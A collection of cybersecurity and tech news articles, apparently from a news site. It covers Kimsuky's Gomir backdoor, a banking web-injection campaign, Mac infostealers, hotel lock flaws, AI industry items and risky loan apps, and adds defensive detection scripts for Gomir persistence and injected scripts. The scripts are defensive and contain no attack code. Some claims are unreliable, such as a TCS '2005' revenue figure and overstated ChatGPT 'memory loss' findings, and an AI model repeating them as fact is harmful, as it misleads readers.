For Palo Alto Networks, acquiring QRadar represents a significant boost. The company plans to integrate QRadar's capabilities with its Cortex XSIAM platform, known for its automation and MDR features. While Palo Alto Networks has made rapid advancements with Cortex XSIAM, analysts like Parizo believe it still lacks the maturity and robustness of IBM's QRadar.

Palo Alto Networks intends to offer free migration paths to its Cortex XSIAM for existing QRadar SaaS customers, with IBM providing over 1,000 security consultants to assist with the transition. This free migration option will also extend to "qualified" on-premises QRadar customers.

The long-term prospects for QRadar SaaS under Palo Alto Networks remain unclear. Analysts suggest that the acquisition aims to capture QRadar's customer base rather than sustain the product. As contractual obligations expire, customers will likely need to transition to Cortex XSIAM or consider alternative vendors.

A notable aspect of the agreement is the incorporation of IBM's Watsonx AI into Cortex XSIAM, which will enhance its Precision AI tools. Gartner's Avivah Litan highlighted IBM's strong AI capabilities, suggesting that this partnership could benefit both companies.

In conclusion, IBM's exit from the cybersecurity software market marks a paradigm shift, prompting customers to reevaluate their security strategies. As Palo Alto Networks integrates QRadar into its offerings, the industry will closely watch how this transition unfolds and its impact.

North Korean Hacker Group Kimsuky Deploys New Linux Malware 'Gomir' via Trojanized Software Installers

North Korean hacker group Kimsuky has deployed a new Linux malware named "Gomir," a variant of the GoBear backdoor. This development marks a significant advancement in the group's cyber espionage tactics. Kimsuky, linked to North Korea’s military intelligence, the Reconnaissance General Bureau (RGB), has a history of sophisticated cyberattacks aimed primarily at South Korean entities.

In early February 2024, researchers at SW2, a threat intelligence company, reported a campaign by Kimsuky involving trojanized versions of various software solutions. These included TrustPKI and NX_PRNMAN from SGA Solutions and Wizvera VeraPort. The primary targets were South Korean entities, and the malicious software delivered the Troll Stealer and Go-based Windows malware known as GoBear. 

Further investigation by Symantec, a Broadcom company, revealed that the same campaign also deployed a Linux variant of the GoBear backdoor, dubbed "Gomir." This new malware shares many similarities with its Windows counterpart, featuring direct command and control (C2) communication, persistence mechanisms, and support for executing a wide range of commands. Upon installation, Gomir checks the group ID value to determine if it runs with root privileges on the Linux machine. 

It then copies itself to /var/log/syslogd for persistence, creates a systemd service named ‘syslogd,’ and issues commands to start the service. Following these steps, the original executable is deleted, and the initial process is terminated. To ensure it runs on system reboot, the backdoor attempts to configure a crontab command by creating a helper file ('cron.txt') in the current working directory. If successful, the helper file is removed. Gomir supports 17 operations triggered by commands received from the C2 via HTTP POST requests. 

These operations include pausing communication with the C2 server, executing arbitrary shell commands, reporting the current working directory, probing network endpoints, and more. Notably, these commands are almost identical to those supported by the GoBear Windows backdoor, highlighting the malware's versatility and Kimsuky's ability to adapt its tools across different operating systems. Symantec researchers have pointed out that supply-chain attacks, such as trojanized software installers and fake installers, are a preferred attack method for North Korean espionage actors. 
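The persistence chain just described (a copy of the backdoor at /var/log/syslogd, a systemd unit named syslogd, and a crontab entry set up through a cron.txt helper) gives a defender concrete artefacts to look for. The Python script below is an added example, not Symantec's or the page's own code: it gathers those artefacts from a host, or from a constructed in-memory snapshot so the logic can be exercised offline, and reports each match. Only the dropped path and the service name come from the write-up; the function names, the unit and cron directories searched, and the sample snapshots are assumptions.

```python
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Artefacts named in the Symantec write-up summarised above.
SUSPECT_PATH = "/var/log/syslogd"      # where Gomir copies itself for persistence
SUSPECT_UNIT = "syslogd.service"       # the systemd service it registers

# Locations searched on a live host (assumed; adjust for the distribution).
UNIT_DIRS = ("/etc/systemd/system", "/usr/lib/systemd/system", "/lib/systemd/system")
CRON_LOCATIONS = ("/etc/crontab", "/etc/cron.d", "/var/spool/cron", "/var/spool/cron/crontabs")


@dataclass
class HostSnapshot:
    """Inputs for the check: unit files and the dropped file (path -> text) plus crontabs.

    Built from the running host by collect_live_snapshot(), or constructed in
    memory so the detection logic can be tested offline."""
    files: Dict[str, str] = field(default_factory=dict)
    crontabs: Dict[str, str] = field(default_factory=dict)


def _read_text(path: str) -> str:
    """Best-effort read; unreadable or binary content just yields an empty string."""
    try:
        with open(path, "r", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def collect_live_snapshot() -> HostSnapshot:
    """Gather the artefacts from this host (user crontabs need root to read)."""
    snap = HostSnapshot()
    if os.path.isfile(SUSPECT_PATH):
        snap.files[SUSPECT_PATH] = ""
    for unit_dir in UNIT_DIRS:
        if os.path.isdir(unit_dir):
            for name in os.listdir(unit_dir):
                full = os.path.join(unit_dir, name)
                if name.endswith(".service") and os.path.isfile(full):
                    snap.files[full] = _read_text(full)
    for loc in CRON_LOCATIONS:
        if os.path.isfile(loc):
            snap.crontabs[loc] = _read_text(loc)
        elif os.path.isdir(loc):
            for name in os.listdir(loc):
                full = os.path.join(loc, name)
                if os.path.isfile(full):
                    snap.crontabs[full] = _read_text(full)
    return snap


def check_gomir_persistence(snap: HostSnapshot) -> List[str]:
    """Return one finding per matching artefact; an empty list means nothing matched."""
    findings: List[str] = []
    # 1. An executable dropped under /var/log: a real syslog daemon lives in /usr/sbin.
    if SUSPECT_PATH in snap.files:
        findings.append(f"file present: {SUSPECT_PATH}")
    # 2. A unit named syslogd.service, or any unit whose ExecStart runs the dropped file.
    for path, content in snap.files.items():
        if not path.endswith(".service"):
            continue
        exec_lines = [ln for ln in content.splitlines() if ln.strip().startswith("ExecStart")]
        runs_dropped = any(SUSPECT_PATH in ln for ln in exec_lines)
        if os.path.basename(path) == SUSPECT_UNIT or runs_dropped:
            detail = " (ExecStart runs the dropped file)" if runs_dropped else ""
            findings.append(f"systemd unit: {path}{detail}")
    # 3. Any active (uncommented) crontab line that references the dropped file.
    pattern = re.compile(re.escape(SUSPECT_PATH) + r"(\s|$)")
    for owner, text in snap.crontabs.items():
        for line in text.splitlines():
            if not line.lstrip().startswith("#") and pattern.search(line):
                findings.append(f"crontab {owner}: {line.strip()}")
    return findings


# Constructed sample snapshots (not real host data) exercising the three checks.
SAMPLE_INFECTED = HostSnapshot(
    files={
        SUSPECT_PATH: "",
        "/etc/systemd/system/syslogd.service":
            "[Service]\nExecStart=/var/log/syslogd\n[Install]\nWantedBy=multi-user.target\n",
        "/usr/lib/systemd/system/rsyslog.service":
            "[Service]\nExecStart=/usr/sbin/rsyslogd -n\n",
    },
    crontabs={"root": "@reboot /var/log/syslogd\n"},
)
SAMPLE_CLEAN = HostSnapshot(
    files={"/usr/lib/systemd/system/rsyslog.service": "[Service]\nExecStart=/usr/sbin/rsyslogd -n\n"},
    crontabs={"/etc/crontab": "# m h dom mon dow user command\n17 * * * * root cd / && run-parts /etc/cron.hourly\n"},
)

if __name__ == "__main__":
    for finding in check_gomir_persistence(collect_live_snapshot()) or ["no Gomir persistence artefacts found"]:
        print(finding)
```

Run it as root on the host being checked. A hit on the first check alone is worth triage, since a legitimate syslog daemon is installed under /usr/sbin and /var/log should hold only log data; confirm any match against Symantec's published IOCs rather than treating the name alone as proof of Gomir.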

The choice of software for trojanization seems to be carefully selected to maximize infection rates among South Korean targets. By compromising widely used software solutions, Kimsuky increases its chances of infiltrating targeted systems and exfiltrating valuable data. The implications of Kimsuky's activities are significant. By enhancing their malware capabilities and expanding their target range to include Linux systems, Kimsuky poses a heightened threat to organizations, particularly those in South Korea. 

The use of advanced malware like Gomir demonstrates the group's continuous evolution and sophistication in cyber espionage. Symantec's report on this campaign includes a set of indicators of compromise (IOCs) for multiple malicious tools observed, including Gomir, Troll Stealer, and the GoBear dropper. These IOCs are crucial for cybersecurity professionals to detect and mitigate the impact of these threats. 

As the digital landscape continues to evolve, the need for robust cybersecurity measures becomes ever more critical. Organizations, especially those in high-target regions like South Korea, must remain vigilant and proactive in their defense strategies. This includes regularly updating software, conducting thorough security assessments, and implementing comprehensive threat detection and response mechanisms. 

The emergence of Gomir and similar threats underscores the importance of international cooperation in combating cybercrime. By sharing intelligence and collaborating on cybersecurity initiatives, nations can better protect their critical infrastructure and sensitive data from sophisticated threat actors like Kimsuky.

Here’s Why You Shouldn’t Trust VPNs Blindly

In an era where we should be gravely concerned about online privacy and security, Virtual Private Networks (VPNs) have emerged as indispensable tools for safeguarding digital identities. However, amidst the buzz of VPN advertisements promising invincibility against cyber threats, it's crucial to peel back the layers of misinformation and understand what VPNs can and cannot do.

A VPN, short for Virtual Private Network, encrypts internet traffic, creating a secure tunnel for data transmission. By masking users' IP addresses, and with them their locations, VPNs offer a degree of anonymity and access to geo-restricted content. While these features provide a layer of protection, it's essential to acknowledge the limitations inherent in VPN technology.

Social Media Risks

Despite VPN encryption, personal information voluntarily shared on social media platforms remains exposed. From name and email address to posts and shares, users reveal sensitive data that malicious actors can exploit. Encouraging users to review their privacy settings and to exercise caution in sharing personal information is paramount in mitigating social media risks.

Phishing Scams

Phishing, a prevalent form of online scam, exploits human vulnerability rather than technical weaknesses. While VPNs can deter interception of internet traffic, they cannot stop users from falling victim to phishing schemes. Combating phishing requires user education on identifying suspicious messages and exercising caution when sharing sensitive information online.

Harmful Software 

While some VPNs offer malware-blocking features, they are not comprehensive antivirus solutions. Combining a VPN with robust antivirus software strengthens defences against malware and viruses. Selecting a reputable VPN provider and deploying supplementary security measures is imperative for maintaining your digital resilience.

Tracking Cookies Intrusions 

VPNs mitigate anonymity risks at the network level but fall short in combating tracking cookies stored by web browsers. Regularly clearing cookies on devices mitigates privacy intrusions, albeit at the expense of convenience. Balancing privacy against usability is part of the challenge of navigating the digital world safely.

Online Accounts and Digital Footprints

Despite VPN usage, online activities remain traceable, particularly within centralised platforms like Google. Logging out of accounts during sensitive transactions and spreading usage across privacy-focused services help minimise digital footprints. Embracing alternative platforms that prioritise user privacy represents a shift towards decentralised digital ecosystems.

VPNs serve as go-to tools for online privacy and security. However, they do not protect against every digital threat. Understanding VPN limitations, and empowering users to adopt a multifaceted approach to digital defence that integrates VPNs with supplementary security measures and prudent online practices, is essential.

By synthesising expert insights and user-centric perspectives, it's evident that using VPNs well requires a nuanced understanding of both their offerings and their constraints.


TCS CEO Predicts AI Revolution to Decimate India's Call Center Industry in Just One Year

As early as next year, the head of Tata Consultancy Services has said, artificial intelligence will leave a "minimal" need for call centres, as AI's rapid advancements are set to disrupt a vast industry across Asia and beyond. Those advancements are expected to result in the demise of vast call centres across the globe.

The chief executive of TCS, K Krithivasan, told the Financial Times that although he had not seen any job reductions at the company so far, the wider adoption of generative artificial intelligence by multinational clients will transform the kinds of customer support centres that, thanks to the massive growth in customer service, have created a lot of jobs in countries like India and the Philippines.

Krithivasan believes that chatbots equipped with generative artificial intelligence will be capable of analysing customer transaction histories as well as performing tasks traditionally handled by call centre agents. Policymakers around the globe have expressed concern that generative AI might negatively affect white-collar jobs, such as those of call centre employees and software developers.

This is a significant threat to India, a country known for its back-office services, whose $48.9 billion IT and business process outsourcing industry accounts for over five million jobs according to Nasscom. The TCS CEO's comments highlight once again that AI is likely to take over many jobs in the future, including those of call centre agents and software developers.

The remarks are particularly important for India, which, according to Nasscom, employs over five million people in IT and BPO roles. In his opinion, AI will have a far greater impact on society than has been anticipated, even though expectations regarding its immediate, short-term effects have been exaggerated.

Krithivasan also said that a growing need for individuals with technological skills will be seen in the coming years. TCS, an arm of India’s Tata conglomerate that develops IT systems for multinational companies, has more than 600,000 employees and generates revenues of more than $30 billion annually.

Order flow is expected to be "significantly increased" and to almost double over the next few quarters, according to Krithivasan. To date, the company has booked a record order intake worth $42.7 billion for the financial year ending in March. Krithivasan explained that IT services spending had previously been clouded with "uncertainty" due to factors such as inflation, geopolitical tensions, and elections.

These factors have forced businesses to postpone investments in new technology projects because of the risk associated with such uncertainties. The CEO noted that TCS's revenue growth declined by 3% in 2005 as a result of this uncertainty. He went on to say that TCS itself has an ongoing pipeline of generative AI projects worth $900 million. During the announcement of TCS's Q4 financial results, Krithivasan also stated that the company has seen greater traction in the market since its AI.Cloud business unit was launched during the quarter.

According to Krithivasan, TCS is also working on generative AI projects, and, as reported by the Financial Times, the value of that project pipeline had doubled to $900 million by the end of the quarter, an increase of 80% over the prior quarter. He expects order flows to increase significantly in the following quarters.

According to Krithivasan, this would not hurt employment, as the demand for tech talent would increase rather than decrease as a consequence. His advice is that companies need to train their workforce to meet this demand, especially in India, where demand is high. According to the results for the fourth quarter of the financial year 2023-24 (Q4 FY24), published on April 12 by India's biggest IT services firm, the company posted a net profit of Rs 12,434 crore, up 9.1 per cent from the third quarter.

Revenue of Rs 61,237 crore was also reported for the quarter, an increase of 3.5 per cent from the previous quarter and of one per cent over the year-ago quarter. Krithivasan warns, however, that despite the expected disruption, the benefits of generative AI over traditional AI should not be overestimated.

Krithivasan, the CEO of TCS, acknowledged the current buzz surrounding AI and its potential impact on jobs, but he stressed that its true effects will unfold gradually, possibly presenting new job opportunities rather than simply displacing existing ones. Addressing concerns about job losses, Krithivasan expressed confidence in the rising demand for tech talent, especially in countries like India. 

He proposed that the evolution of AI would result in the emergence of more skilled professionals, ultimately leading to job growth rather than reduction. However, a recent report from McKinsey Global Institute titled "Generative AI and the Future of Work in America" paints a contrasting picture. According to the report, jobs involving tasks that can be automated, such as data collection and repetitive duties, will likely be taken over by AI to enhance efficiency. 

Sectors like office support, customer service, and food service are expected to be particularly impacted by this AI-driven transformation, potentially leading to significant changes in employment dynamics.

Macs Vulnerable to Info-Stealing Malware via Ads and Fake Software

As cyber threats continue to evolve, Mac users are increasingly finding themselves in the crosshairs of malicious actors. In recent developments, a new strain of malware has emerged, posing a significant risk to Mac users worldwide. This malware, designed to steal sensitive information, is spread through deceptive ads and fake software, highlighting the importance of vigilance and robust security measures for Mac users.

The emergence of this info-stealing malware underscores the evolving landscape of cyber threats targeting Mac users. Historically, Macs have been perceived as less susceptible to malware compared to other operating systems like Windows. However, as Mac usage has surged in recent years, cybercriminals have shifted their focus to exploit vulnerabilities in macOS, the operating system powering Mac devices. 

One of the primary vectors for the spread of this malware is through deceptive advertisements and fake software downloads. These ads often masquerade as legitimate offers or updates, enticing users to click on them unsuspectingly. Once clicked, users may inadvertently download malicious software onto their Mac devices, compromising their security and privacy. 

Furthermore, fake software downloads present another avenue for malware distribution. Cybercriminals create counterfeit versions of popular software applications, such as antivirus programs or productivity tools, and distribute them through unofficial channels. Unsuspecting users may download these fake applications, unaware of the malware lurking within. The consequences of falling victim to info-stealing malware can be severe. 

Once installed on a Mac device, this malware can harvest sensitive information, including login credentials, financial data, and personal files. This stolen information can then be used for various malicious purposes, such as identity theft, financial fraud, or extortion. To protect against this growing threat, Mac users must remain vigilant and adopt proactive security measures. 

Firstly, it is essential to exercise caution when encountering online advertisements and software downloads. Users should only download software from trusted sources, such as official app stores or reputable websites, and avoid clicking on suspicious ads or links. Additionally, maintaining up-to-date security software is crucial for detecting and mitigating malware threats. Mac users should invest in reputable antivirus and antimalware solutions that provide real-time protection against emerging threats. 

Regularly updating macOS and installed applications can also patch known vulnerabilities and strengthen overall security. Furthermore, practicing good cybersecurity hygiene is essential for safeguarding personal information and sensitive data. This includes using strong, unique passwords for online accounts, enabling two-factor authentication where available, and avoiding the use of public Wi-Fi networks for sensitive activities. 

In the event of a suspected malware infection, Mac users should take immediate action to mitigate the threat. This may involve running a full system scan using antivirus software, removing any detected malware, and resetting compromised passwords to prevent unauthorized access to accounts. Overall, the rise of info-stealing malware targeting Mac users serves as a stark reminder of the importance of cybersecurity awareness and preparedness. 

By staying informed about emerging threats, adopting proactive security measures, and practicing good cybersecurity hygiene, Mac users can minimize their risk of falling victim to malicious attacks. With cyber threats continuing to evolve, maintaining a vigilant stance against malware remains paramount for protecting personal information and ensuring a safe digital environment.

Assessing ChatGPT Impact: Memory Loss, Student Procrastination

In a study published in the International Journal of Educational Technology in Higher Education, researchers concluded that students are more likely to use ChatGPT, a tool based on generative artificial intelligence, when overwhelmed with academic work. The study also revealed that ChatGPT use is correlated with procrastination, memory loss, a decrease in academic performance, and concern about the future.

Using generative AI in education has been shown to have a profound impact, both in its widespread use and in its potential drawbacks. The very fact that advanced AI programs have been publicly available for only a short while has already raised a great deal of concern. AI has created a lot of dangers in the past few years, from people using the programs to produce work that was not their own and taking credit for it, to AI impersonating celebrities without their consent.

Legislators are finding it hard to keep up. AI software programs like ChatGPT, however, have been found to have negative psychological effects on students, including memory loss, an unfortunate side effect that is only now coming to light. The study showed that students who use artificial intelligence software such as ChatGPT are more likely to perform poorly academically, suffer memory loss, and procrastinate more frequently.

It has been found that 32% of university students already use the AI chatbot ChatGPT every week, and it can generate convincing answers to simple text prompts. Several new studies have found that university students who use ChatGPT to complete assignments fall into a vicious circle where they don’t give themselves enough time to complete their assignments, they need to rely on ChatGPT to complete them, and their ability to remember facts gradually weakens over time. 

A study by the University of Oxford found that students who had heavy workloads and a lot of time pressure were more likely to use ChatGPT than those who had less sensitive rewards. They did, however, find a correlation between the degree to which a student reflects on their conscientiousness regarding work quality and the extent to which they use ChatGPT. This study found that students who frequently used ChatGPT procrastinated more than students who rarely used ChatGPT. 

This study was conducted in two phases, allowing the researchers to gain a better understanding of these dynamics. As part of the study, a scale was developed and validated to assess the use of ChatGPT as an academic tool by university students. An initial set of 12 items was generated and then reduced to 10 following expert evaluations of content validity.

Eventually, a final selection of eight items was made through exploratory factor analysis and reliability testing, resulting in an effective measure of the extent to which ChatGPT has been used for academic purposes. The researchers then conducted three surveys of students to determine who is most likely to use ChatGPT and what consequences users experience.

To investigate whether ChatGPT has any beneficial effects, the researchers asked a series of questions. They hypothesised that students who rely on AI because they feel overwhelmed by their workload probably do so in a bid to save time. The results suggest that ChatGPT may be a tool used mainly by students who were already struggling academically.

The advancement of artificial intelligence can be amazing, as exemplified by its recent use to recreate Marilyn Monroe's personality, but the dangers of a system allowing for super-intelligence cannot be ignored. There is no doubt that artificial intelligence is becoming more advanced every day. At the end of the research, the researchers found that high use of ChatGPT was linked to detrimental outcomes for the participants. 

ChatGPT has been reported to cause memory loss in students and a lower overall GPA. The study's authors recommend that educators assign activities, assignments, or projects that cannot be completed by ChatGPT, so that students are actively engaged in critical thinking and problem-solving. This would help mitigate ChatGPT's adverse effects on students' learning and mental capabilities.

How Hackers Breached 3 Million Hotel Keycard Locks

The Unsaflok hack technique has raised concerns about the security of Saflok hotel locks. This sophisticated method exploits vulnerabilities in Saflok's system, potentially compromising the safety of guests and the reputation of hospitality establishments.

The Unsaflok hack technique, first uncovered by security researchers, demonstrates how cybercriminals can exploit weaknesses in the Saflok electronic locking system to gain unauthorized access to hotel rooms. By leveraging a combination of hardware and software tools, hackers can bypass the locks' security mechanisms, granting them entry without leaving any visible signs of tampering. 

The implications of such a breach are profound. Beyond the immediate security risks to guests and their belongings, a compromised locking system can tarnish a hotel's reputation and lead to financial losses. Moreover, the trust between guests and hospitality providers, essential for maintaining customer loyalty, can be severely undermined. 

To mitigate the risks associated with the Unsaflok hack technique and similar threats, hotel operators must take proactive steps to enhance their security measures. Firstly, conducting a thorough assessment of existing locking systems to identify vulnerabilities is crucial. This includes examining both hardware and software components for any weaknesses that could be exploited by hackers. Implementing robust access control measures is essential for safeguarding against unauthorized entry. This may involve upgrading to newer, more secure locking systems that incorporate advanced encryption techniques and tamper-resistant features. 

Additionally, deploying intrusion detection systems and surveillance cameras can help detect and deter unauthorized access attempts in real-time. Regular security audits and penetration testing can provide valuable insights into the effectiveness of existing security measures and identify areas for improvement. By staying vigilant and proactive in addressing potential vulnerabilities, hotel operators can minimize the risk of falling victim to cyberattacks and protect the safety and privacy of their guests.

Furthermore, fostering a culture of cybersecurity awareness among staff members is critical. Employees should receive comprehensive training on identifying and reporting suspicious activities, as well as adhering to best practices for safeguarding sensitive information. By empowering staff to play an active role in cybersecurity defense, hotels can create a more resilient security posture. 

The Unsaflok hack technique highlights the importance of robust cybersecurity measures in the hospitality industry. By understanding the vulnerabilities inherent in electronic locking systems and taking proactive steps to enhance security, hotels can mitigate the risks posed by cyber threats and ensure the safety and satisfaction of their guests. Ultimately, investing in cybersecurity is not just a matter of protecting assets; it's a commitment to maintaining trust and reputation in an increasingly digital world.

Nvidia Unveils Latest AI Chip, Promising 30x Faster Performance

Nvidia, a dominant force in the semiconductor industry, has once again raised the bar with its latest unveiling of the B200 "Blackwell" chip. Promising an astonishing 30 times faster performance than its predecessor, this cutting-edge AI chip represents a significant leap forward in computational capabilities. The announcement was made at Nvidia's annual developer conference, where CEO Jensen Huang showcased not only the groundbreaking new chip but also a suite of innovative software tools designed to enhance system efficiency and streamline AI integration for businesses.

The excitement surrounding the conference was palpable, with attendees likening the atmosphere to the early days of tech presentations by industry visionaries like Steve Jobs. Bob O'Donnell from Technalysis Research, who was present at the event, remarked, "the buzz was in the air," underscoring the anticipation and enthusiasm for Nvidia's latest innovations. 

One of the key highlights of the conference was Nvidia's collaboration with major tech giants such as Amazon, Google, Microsoft, and OpenAI, all of whom expressed keen interest in leveraging the capabilities of the new B200 chip for their cloud-computing services and AI initiatives. With an 80% market share and a track record of delivering cutting-edge solutions, Nvidia aims to solidify its position as a leader in the AI space. 

In addition to the B200 chip, Nvidia also announced plans for a new line of chips tailored for automotive applications. These chips will enable functionalities like in-vehicle chatbots, further expanding the scope of AI integration in the automotive industry. Chinese electric vehicle manufacturers BYD and Xpeng have already signed up to incorporate Nvidia's new chips into their vehicles, signalling strong industry endorsement. 

Furthermore, Nvidia demonstrated its commitment to advancing robotics technology by introducing a series of chips specifically designed for humanoid robots. This move underscores the company's versatility and its role in shaping the future of AI-powered innovations across various sectors. Founded in 1993, Nvidia initially gained recognition for its graphics processing chips, particularly in the gaming industry. 

However, its strategic investments in machine learning capabilities have propelled it to the forefront of the AI revolution. Despite facing increasing competition from rivals like AMD and Intel, Nvidia remains a dominant force in the market, capitalizing on the rapid expansion of AI-driven technologies. As the demand for AI solutions continues to soar, Nvidia's latest advancements position it as a key player in driving innovation and shaping the trajectory of AI adoption in the business world. With its track record of delivering high-performance chips and cutting-edge software tools, Nvidia is poised to capitalize on the myriad opportunities presented by the burgeoning AI market.

Sophisticated Web Injection Campaign Targets 50,000 Individuals, Pilfering Banking Data

Web injections, a favoured technique employed by various banking Trojans, have been a persistent threat in the realm of cyberattacks. These malicious injections enable cybercriminals to manipulate data exchanged between users and web browsers, potentially compromising sensitive information.

In a new finding, it has been revealed that a malware campaign that first came to light in March 2023 has used JavaScript web injections in an attempt to steal data from over 50 banks, affecting around 50,000 users in North America, South America, Europe, and Japan.

IBM Security has dissected some JavaScript code that was injected into people's online banking pages to steal their login credentials, saying 50,000 user sessions with more than 40 banks worldwide were compromised by the malicious software in 2023. As IBM’s researchers explained, it all starts with a malware infection on the victim’s endpoint. 

After that, when the victim visits a malicious site, the malware will inject a new script tag which is then loaded into the browser and modifies the website’s content. That allows the attackers to grab passwords and intercept multi-factor authentication codes and one-time passwords.

IBM says this extra step is unusual, as most malware performs web injections directly on the web page. This new approach makes the attacks more stealthy, as static analysis checks are unlikely to flag the simpler loader script as malicious while still permitting dynamic content delivery, allowing attackers to switch to new second-stage payloads if needed. 

It's also worth noting that the malicious script resembles legitimate JavaScript content delivery networks (CDN), using domains like cdnjs[.]com and unpkg[.]com, to evade detection. Furthermore, the script performs checks for specific security products before execution. Judging by the evidence to hand, it appears the Windows malware DanaBot, or something related or connected to it, infects victims' PCs – typically from spam emails and other means – and then waits for the user to visit their bank website. 

At that point the malware kicks in and injects JavaScript into the login page. The injected code runs in the browser and intercepts the victim's credentials as they are typed, passing them to fraudsters who use them to drain accounts. The script is fairly smart: it talks to a remote command-and-control (C2) server and, once it has done its job, removes itself from the DOM tree, deleting itself from the login page, which makes it tricky to detect and analyze.
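The two details above, a script tag injected at run time from a CDN-lookalike host and a loader that deletes itself once it has run, are what in-page telemetry can watch for. The following is an added example, not code from IBM's report or from the malware: it classifies script sources against an allowlist of hosts the page legitimately loads from, flags unknown or brand-borrowing hosts, and records removals as well as additions so a self-deleting loader still leaves a trace. The hostnames, brand tokens and sample events are constructed for illustration.

```javascript
// Added example (not from IBM's report or the malware): in-page telemetry that
// flags <script> elements added to, or removed from, the DOM whose src is not
// on an allowlist of hosts the page legitimately loads from. Host names and
// sample events below are constructed for illustration.

// Hosts this (assumed) banking front end is allowed to load scripts from.
const ALLOWED_SCRIPT_HOSTS = new Set([
  'bank.example',          // the application's own origin (assumed)
  'cdnjs.cloudflare.com',  // cdnjs asset host
  'unpkg.com',             // unpkg asset host
]);

// Brand tokens that lookalike hosts tend to reuse (constructed list).
const CDN_BRAND_TOKENS = ['cdnjs', 'unpkg', 'jsdelivr'];

// Classify one script src. Returns { verdict, host } where verdict is one of
// 'allowed', 'lookalike', 'unknown', 'inline' (no src) or 'unparseable'.
function classifyScriptSrc(src, allowedHosts = ALLOWED_SCRIPT_HOSTS) {
  if (src === null || src === undefined || src === '') {
    // Inline script bodies cannot be allowlisted by host; CSP nonces/hashes
    // are the control there, so we simply report them.
    return { verdict: 'inline', host: null };
  }
  let url;
  try {
    url = new URL(src, 'https://bank.example/'); // base resolves relative srcs
  } catch (e) {
    return { verdict: 'unparseable', host: null };
  }
  const host = url.hostname.toLowerCase();
  if (allowedHosts.has(host)) return { verdict: 'allowed', host };
  // Not allowlisted but borrowing a CDN brand name: treat as a lookalike.
  const lookalike = CDN_BRAND_TOKENS.some((t) => host.includes(t));
  return { verdict: lookalike ? 'lookalike' : 'unknown', host };
}

// Script-node events in the shape a MutationObserver callback would produce.
// Constructed sample: a loader script from a lookalike host appears and then
// deletes itself, which is why removals are recorded as well as additions.
const SAMPLE_EVENTS = [
  { type: 'added',   src: '/static/app.js' },
  { type: 'added',   src: 'https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js' },
  { type: 'added',   src: 'https://cdnjs-static.example/jquery.min.js' },
  { type: 'removed', src: 'https://cdnjs-static.example/jquery.min.js' },
  { type: 'added',   src: null },
];

// Run the classifier over a list of events and keep everything not allowed.
function auditScriptEvents(events, allowedHosts = ALLOWED_SCRIPT_HOSTS) {
  const findings = [];
  for (const ev of events) {
    const c = classifyScriptSrc(ev.src, allowedHosts);
    if (c.verdict === 'allowed') continue;
    findings.push({ type: ev.type, src: ev.src, verdict: c.verdict, host: c.host });
  }
  return findings;
}

// Browser hookup: watch the whole document for script nodes coming and going
// and hand each finding to `report` (a beacon to a fraud backend, for
// instance). Returns null outside a browser so the file also runs under Node.
function installScriptObserver(report = (f) => console.warn('script event', f)) {
  if (typeof MutationObserver === 'undefined' || typeof document === 'undefined') {
    return null;
  }
  const toEvent = (type, node) => ({
    type,
    src: node.getAttribute ? node.getAttribute('src') : null,
  });
  const observer = new MutationObserver((mutations) => {
    const events = [];
    for (const m of mutations) {
      for (const n of m.addedNodes) if (n.nodeName === 'SCRIPT') events.push(toEvent('added', n));
      for (const n of m.removedNodes) if (n.nodeName === 'SCRIPT') events.push(toEvent('removed', n));
    }
    auditScriptEvents(events).forEach(report);
  });
  observer.observe(document.documentElement, { childList: true, subtree: true });
  return observer;
}

// Stand-alone run over the constructed sample: three findings, one of them
// the removal of the lookalike loader.
console.log(auditScriptEvents(SAMPLE_EVENTS));
installScriptObserver();
```

Two caveats apply. Malware that already runs on the endpoint can strip a Content-Security-Policy header or tamper with this telemetry before it reports, so treat the findings as a detection signal to correlate with server-side data (a 2FA or phone-number prompt the bank never issued, a session that logs in from an unexpected client), not as a preventive control. And because the loader deletes itself, a one-off DOM scan at page load will usually come up clean; observing removals is what catches it.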

The script's behaviour is driven by an "mlink" flag that the C2 sends back; in total there are nine different actions it can perform depending on the "mlink" value. These include injecting a prompt for the user's phone number or two-factor authentication token, which the miscreants combine with the intercepted username and password to log in to the victim's bank account and steal their money.

The script can also inject an error message on the login page saying that banking services are unavailable for 12 hours. "This tactic aims to discourage the victim from attempting to access their account, providing the threat actor with an opportunity to perform uninterrupted actions," IBM's Tal Langus said. Other actions include injecting a page-loading overlay and scrubbing all injected content from the page.

"This sophisticated threat showcases advanced capabilities, particularly in executing man-in-the-browser attacks with its dynamic communication, web injection methods and the ability to adapt based on server instructions and current page state," Langus warned. "The malware represents a significant danger to the security of financial institutions and their customers." Cybercriminals are exploiting sophisticated web injection techniques against more than 50,000 banking sessions around the world, and the threat is escalating.

DanaBot, or similar malware, manipulates what the user sees by injecting JavaScript, which lets it steal login credentials with ease. In the attack detected by IBM Security, the malicious scripts are injected directly into banking pages and adapt as the attack unfolds, evading conventional detection methods.

To reduce the risk of infection, users are advised to keep their software up to date, enable multi-factor authentication, and be cautious when opening email attachments and links. Staying vigilant about identifying and reporting suspicious activity is part of keeping up with adaptive threats like this one.

17 Risky Apps Threatening Your Smartphone Security

Users of Google Android and Apple iPhone smartphones have recently received an urgent warning to remove certain apps from their devices immediately. The apps in question have been flagged as posing serious risks to users' security and privacy.

The alarming revelation comes as experts have uncovered 17 dangerous apps that infiltrated the Google Play Store and Apple App Store, putting millions of users at risk of malware and other malicious activity. Disguised primarily as loan services, these apps have been identified as major vehicles for spreading harmful software.

The identified dangerous apps that demand immediate deletion include:

  1. AA Kredit
  2. Amor Cash
  3. GuayabaCash
  4. EasyCredit
  5. Cashwow
  6. CrediBus
  7. FlashLoan
  8. PréstamosCrédito
  9. Préstamos De Crédito-YumiCash
  10. Go Crédito
  11. Instantáneo Préstamo
  12. Cartera grande
  13. Rápido Crédito
  14. Finupp Lending
  15. 4S Cash
  16. TrueNaira
  17. EasyCash

According to a report by Forbes, the identified apps can compromise sensitive information and expose users to financial fraud. Financial Express also emphasizes the severity of the issue, urging users to take prompt action against these potential threats.

Google's Play Store, known for its extensive collection of applications, has been identified as the main distributor of these malicious apps. The study behind the findings urges users to exercise caution when downloading apps from the platform and stresses the role of app store policies in curbing the distribution of harmful software.

Apple, recognizing the gravity of the situation, has announced its intention to make changes to the App Store policies. In response to the evolving landscape of threats and the increasing sophistication of malicious actors, the tech giant aims to enhance its security measures and protect its user base.

The urgency of the situation cannot be overstated, as the identified apps can potentially compromise personal and financial information. Users must heed the warnings and take immediate action by deleting these apps from their devices.

